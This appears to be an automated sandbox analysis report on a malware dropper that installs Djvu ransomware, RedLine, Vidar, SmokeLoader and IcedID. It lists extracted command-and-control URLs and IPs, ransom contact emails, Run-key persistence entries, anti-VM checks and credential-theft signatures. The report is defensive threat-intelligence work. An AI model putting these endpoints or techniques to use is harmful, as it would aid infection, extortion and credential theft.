Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1805s -
max time network
1806s -
platform
windows10_x64 -
resource
win10-fr -
submitted
18-09-2021 21:25
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
c9b742fa61ccc9b3afa7217f3bfe2590
-
SHA1
7c1ddc294d0d9214c1e07ba239d24ffd2a01854d
-
SHA256
5967f1aef118ddfcd1d14d5cf3f29a62a845052c9ed9ce91587c0015b1047c58
-
SHA512
27b326724da58f967c49eb0f889af63636b2f7e49b1356bf76677fcc419f8eca41eb8f2fbddc4599f1f3e83fffa6a98a2b74315857f909d78254d4083c381f99
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
C:\_readme.txt
djvu
manager@mailtemp.ch
managerhelper@airmail.cc
https://we.tl/t-vtoEIhR0SI
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
redline
ANI
45.142.215.47:27643
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
pab123
45.14.49.169:22411
Extracted
icedid
3162718704
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
OneDriveSetup.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" OneDriveSetup.exe -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4160 4028 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9092 4028 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
Processes:
resource yara_rule behavioral7/memory/5080-262-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral7/memory/5080-263-0x000000000041C5CA-mapping.dmp family_redline behavioral7/memory/3172-284-0x0000000002340000-0x000000000235F000-memory.dmp family_redline behavioral7/memory/3172-308-0x00000000024E0000-0x00000000024FE000-memory.dmp family_redline behavioral7/memory/5080-309-0x0000000005270000-0x0000000005876000-memory.dmp family_redline behavioral7/memory/2196-381-0x000000000041C5E2-mapping.dmp family_redline behavioral7/memory/3844-340-0x000000000041C5DE-mapping.dmp family_redline behavioral7/memory/3844-438-0x0000000005010000-0x0000000005616000-memory.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20873bc74eb80e0.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20873bc74eb80e0.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5548 created 4820 5548 WerFault.exe Sat200240b71b.exe PID 7892 created 5608 7892 WerFault.exe Yry2f6UscYEHvhxNM_NasvjF.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
svchost.exedescription pid process target process PID 6216 created 3720 6216 svchost.exe gWaq3hqPJ5rZctwz9iAX7kUB.exe PID 6216 created 7212 6216 svchost.exe LzmwAqmV.exe PID 6216 created 9276 6216 svchost.exe OneDriveSetup.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral7/memory/4820-243-0x0000000000AF0000-0x0000000000BC4000-memory.dmp family_vidar behavioral7/memory/4820-244-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC7375180\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC7375180\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC7375180\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC7375180\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC7375180\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC7375180\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC7375180\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 15 IoCs
Processes:
schtasks.exeschtasks.exepowershell.execmd.exepowershell.exeWMIC.exerundll32.exeflow pid process 203 5080 schtasks.exe 229 5156 schtasks.exe 235 5156 schtasks.exe 236 5156 schtasks.exe 287 6764 powershell.exe 355 8468 cmd.exe 356 8468 cmd.exe 372 8284 powershell.exe 396 8468 cmd.exe 287 6764 powershell.exe 203 5080 schtasks.exe 52 5080 schtasks.exe 443 8732 WMIC.exe 445 8732 WMIC.exe 512 10184 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
Ze2ro.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Ze2ro.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSat20873bc74eb80e0.exeSat2071d99516dc03841.exeSat20578e6239.exeSat20fbae42a4.exeSat20ecdfe3ee79f.exeSat205eb4a2ece877a.exeSat20ed203af5.exeSat20de8d8504.exeSat2077373f11706fb7.exeSat20545a92617f.exeSat20627fa1c49.exeSat20fbae42a4.tmpSat200240b71b.exeSat2026ef0d60b87a3f5.exeZe2ro.exeSat2026ef0d60b87a3f5.exe7541406.scrLzmwAqmV.exetmpE781_tmp.exeSat2026ef0d60b87a3f5.exe5875517.scrUltraMediaBurner.exe8airpAP2vSR1mNtVUpIMLusz.exe5125044.scrPublicDwlBrowser1100.exe2.exesetup.exeaskinstall58.exe5125044.scr3040445.scrLivelyScreenRecMik18.exe6.exeConhost.exetmpE781_tmp.exe9k747JMG7jwW9QQSPMvI1cd9.exeYry2f6UscYEHvhxNM_NasvjF.exeqMwqayby3LtBSXcMFZn4WENT.exeGM2TDOTFhN_nbC2OoeD2Rg86.exe3002.exe3AQleALHNNRtcBTszRyp7hDK.exeConhost.exehJfXrqQQ_Fe0h5fLGBSbNOgz.exegWaq3hqPJ5rZctwz9iAX7kUB.exeQXHofo5pEteva5oWRgeBqUVV.exejhuuee.exe4x4_z5aLp04hx89ID2XGg6um.exePPlD8Z0K7d9WUvvAWu1vun4D.exeOPlg5C44foFtCP1xTsMRcx2L.exepDOVOMsZF5WLWhICeZK_Vlir.exetaskkill.exeBearVpn 3.exehKGOBqPQ2CtFcQ7L_yVukhul.exeelADi5yzsqicpvJG5uTkV55y.exebRJ06_QbRE9hlrR0l4Zuq2_k.exe8043795.exeservices64.exeI3gaVL3bm1lMtsvde3S141IC.exef.exe4x4_z5aLp04hx89ID2XGg6um.exewwi.exewwl.execm3.exepid process 4988 setup_installer.exe 5088 setup_install.exe 4108 Sat20873bc74eb80e0.exe 4444 Sat2071d99516dc03841.exe 3128 Sat20578e6239.exe 3424 Sat20fbae42a4.exe 1016 Sat20ecdfe3ee79f.exe 4604 Sat205eb4a2ece877a.exe 4600 Sat20ed203af5.exe 4632 Sat20de8d8504.exe 732 Sat2077373f11706fb7.exe 4640 Sat20545a92617f.exe 3172 Sat20627fa1c49.exe 4020 Sat20fbae42a4.tmp 4820 Sat200240b71b.exe 3860 Sat2026ef0d60b87a3f5.exe 3356 Ze2ro.exe 3036 Sat2026ef0d60b87a3f5.exe 4456 7541406.scr 4668 LzmwAqmV.exe 1640 tmpE781_tmp.exe 5080 Sat2026ef0d60b87a3f5.exe 1748 5875517.scr 1216 UltraMediaBurner.exe 4796 8airpAP2vSR1mNtVUpIMLusz.exe 2468 5125044.scr 2700 PublicDwlBrowser1100.exe 4384 2.exe 4204 setup.exe 3360 askinstall58.exe 3844 5125044.scr 4748 3040445.scr 1868 LivelyScreenRecMik18.exe 5156 6.exe 5340 Conhost.exe 2196 tmpE781_tmp.exe 5632 9k747JMG7jwW9QQSPMvI1cd9.exe 5608 Yry2f6UscYEHvhxNM_NasvjF.exe 5624 qMwqayby3LtBSXcMFZn4WENT.exe 5616 GM2TDOTFhN_nbC2OoeD2Rg86.exe 5692 3002.exe 5736 3AQleALHNNRtcBTszRyp7hDK.exe 5748 Conhost.exe 2692 hJfXrqQQ_Fe0h5fLGBSbNOgz.exe 3720 gWaq3hqPJ5rZctwz9iAX7kUB.exe 976 QXHofo5pEteva5oWRgeBqUVV.exe 3580 jhuuee.exe 648 4x4_z5aLp04hx89ID2XGg6um.exe 3468 PPlD8Z0K7d9WUvvAWu1vun4D.exe 3232 OPlg5C44foFtCP1xTsMRcx2L.exe 1124 pDOVOMsZF5WLWhICeZK_Vlir.exe 5052 taskkill.exe 5128 BearVpn 3.exe 2116 hKGOBqPQ2CtFcQ7L_yVukhul.exe 4960 elADi5yzsqicpvJG5uTkV55y.exe 4228 bRJ06_QbRE9hlrR0l4Zuq2_k.exe 6292 8043795.exe 6604 services64.exe 6832 I3gaVL3bm1lMtsvde3S141IC.exe 5364 f.exe 6940 4x4_z5aLp04hx89ID2XGg6um.exe 6120 wwi.exe 5356 wwl.exe 6340 cm3.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
DCC6.exedescription ioc process File renamed C:\Users\Admin\Pictures\EnablePing.tiff => C:\Users\Admin\Pictures\EnablePing.tiff.koom DCC6.exe File opened for modification C:\Users\Admin\Pictures\ExpandRestart.tiff DCC6.exe File renamed C:\Users\Admin\Pictures\ExpandRestart.tiff => C:\Users\Admin\Pictures\ExpandRestart.tiff.koom DCC6.exe File renamed C:\Users\Admin\Pictures\InvokeUpdate.raw => C:\Users\Admin\Pictures\InvokeUpdate.raw.koom DCC6.exe File renamed C:\Users\Admin\Pictures\PublishImport.tif => C:\Users\Admin\Pictures\PublishImport.tif.koom DCC6.exe File opened for modification C:\Users\Admin\Pictures\EnablePing.tiff DCC6.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
qMwqayby3LtBSXcMFZn4WENT.exeQXHofo5pEteva5oWRgeBqUVV.exepDOVOMsZF5WLWhICeZK_Vlir.exe7048378.scr6419.exeBC4C.exewwi.exe5875517.scr3040445.scr9k747JMG7jwW9QQSPMvI1cd9.exewwl.exeA8C5.exe8043795.exe4203002.exeInstall.exerundll32.exeD9E4.exeI3gaVL3bm1lMtsvde3S141IC.exe7963793.scrEACD.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qMwqayby3LtBSXcMFZn4WENT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QXHofo5pEteva5oWRgeBqUVV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion pDOVOMsZF5WLWhICeZK_Vlir.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion pDOVOMsZF5WLWhICeZK_Vlir.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7048378.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6419.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6419.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BC4C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5875517.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3040445.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9k747JMG7jwW9QQSPMvI1cd9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wwl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion A8C5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5875517.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9k747JMG7jwW9QQSPMvI1cd9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8043795.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4203002.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3040445.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8043795.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion D9E4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion A8C5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qMwqayby3LtBSXcMFZn4WENT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion I3gaVL3bm1lMtsvde3S141IC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion I3gaVL3bm1lMtsvde3S141IC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wwl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7963793.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EACD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7963793.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion D9E4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4203002.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EACD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QXHofo5pEteva5oWRgeBqUVV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7048378.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BC4C.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Sat20ecdfe3ee79f.exeqT3dWYBP7ZsuOrwW4ZcUbjl6.exeDirehilomi.exePovXUCA.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Sat20ecdfe3ee79f.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation qT3dWYBP7ZsuOrwW4ZcUbjl6.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Direhilomi.exe Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation PovXUCA.exe -
Loads dropped DLL 39 IoCs
Processes:
setup_install.exeSat20fbae42a4.tmprundll32.exetaskkill.exebRJ06_QbRE9hlrR0l4Zuq2_k.exesetup_2.tmpregsvr32.exeregsvr32.execmd.exerundll32.exeregsvr32.exeregsvr32.exebuild2.exeD8FD.exe905.exerundll32.exeFileSyncConfig.exepid process 5088 setup_install.exe 5088 setup_install.exe 5088 setup_install.exe 5088 setup_install.exe 5088 setup_install.exe 5088 setup_install.exe 4020 Sat20fbae42a4.tmp 3504 rundll32.exe 5052 taskkill.exe 4228 bRJ06_QbRE9hlrR0l4Zuq2_k.exe 5652 setup_2.tmp 8960 regsvr32.exe 8980 regsvr32.exe 8468 cmd.exe 6096 rundll32.exe 9780 regsvr32.exe 9844 regsvr32.exe 8468 cmd.exe 8468 cmd.exe 8468 cmd.exe 8468 cmd.exe 9448 build2.exe 9448 build2.exe 10092 D8FD.exe 10092 D8FD.exe 10092 D8FD.exe 10092 D8FD.exe 10092 D8FD.exe 10004 905.exe 10004 905.exe 10004 905.exe 10004 905.exe 10004 905.exe 10184 rundll32.exe 4256 FileSyncConfig.exe 4256 FileSyncConfig.exe 4256 FileSyncConfig.exe 4256 FileSyncConfig.exe 4256 FileSyncConfig.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\5875517.scr themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
Ze2ro.exeDCC6.exe7916.exeOneDriveSetup.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Welaehywola.exe\"" Ze2ro.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7b094cea-f672-4562-9e16-411086b96df0\\DCC6.exe\" --AutoStart" DCC6.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\service = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7916.exe" 7916.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" OneDriveSetup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
D9E4.exeEACD.exeqMwqayby3LtBSXcMFZn4WENT.exepDOVOMsZF5WLWhICeZK_Vlir.exewwl.exe4203002.exemd8_8eus.exeBC4C.exe3040445.scrQXHofo5pEteva5oWRgeBqUVV.exeI3gaVL3bm1lMtsvde3S141IC.exeA8C5.exe9k747JMG7jwW9QQSPMvI1cd9.exe8043795.exe7963793.scr6419.exe5875517.scr7048378.scrwwi.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D9E4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EACD.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qMwqayby3LtBSXcMFZn4WENT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA pDOVOMsZF5WLWhICeZK_Vlir.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wwl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4203002.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BC4C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3040445.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QXHofo5pEteva5oWRgeBqUVV.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA I3gaVL3bm1lMtsvde3S141IC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA A8C5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9k747JMG7jwW9QQSPMvI1cd9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8043795.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7963793.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6419.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5875517.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7048378.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wwi.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
PovXUCA.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini PovXUCA.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 182 ipinfo.io 365 api.2ip.ua 698 api.2ip.ua 760 api.2ip.ua 777 api.2ip.ua 31 ipinfo.io 32 ipinfo.io 183 ipinfo.io 319 ipinfo.io 25 ip-api.com 128 ip-api.com 297 api.2ip.ua 298 api.2ip.ua 697 api.2ip.ua -
Drops file in System32 directory 56 IoCs
Processes:
wjichPy.exePovXUCA.exesvchost.exerundll32.exesvchost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exesvchost.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini wjichPy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 PovXUCA.exe File opened for modification C:\Windows\System32\Tasks\dqMFPCMVHmhnSY svchost.exe File opened for modification C:\Windows\System32\Tasks\spujSHjvBOHs svchost.exe File opened for modification C:\Windows\System32\Tasks\gBcpYIDWL svchost.exe File opened for modification C:\Windows\System32\Tasks\nMmJzTJTMvgDqJXEl svchost.exe File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\bRciptYQhTCMvEFWGJ svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData PovXUCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 PovXUCA.exe File opened for modification C:\Windows\System32\Tasks\ArGDBXWmyYtLacf2 svchost.exe File opened for modification C:\Windows\System32\Tasks\sOuBCsGGBJoge2 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat PovXUCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE PovXUCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content PovXUCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\xsEpqqHAgqAwsAroz svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\Tasks\gdlTlvZfIMOZAvCeb2 svchost.exe File opened for modification C:\Windows\System32\Tasks\PcFGIyIlUJyYablHCHc2 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90} svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 PovXUCA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\gsaFyPMzr svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 PovXUCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification 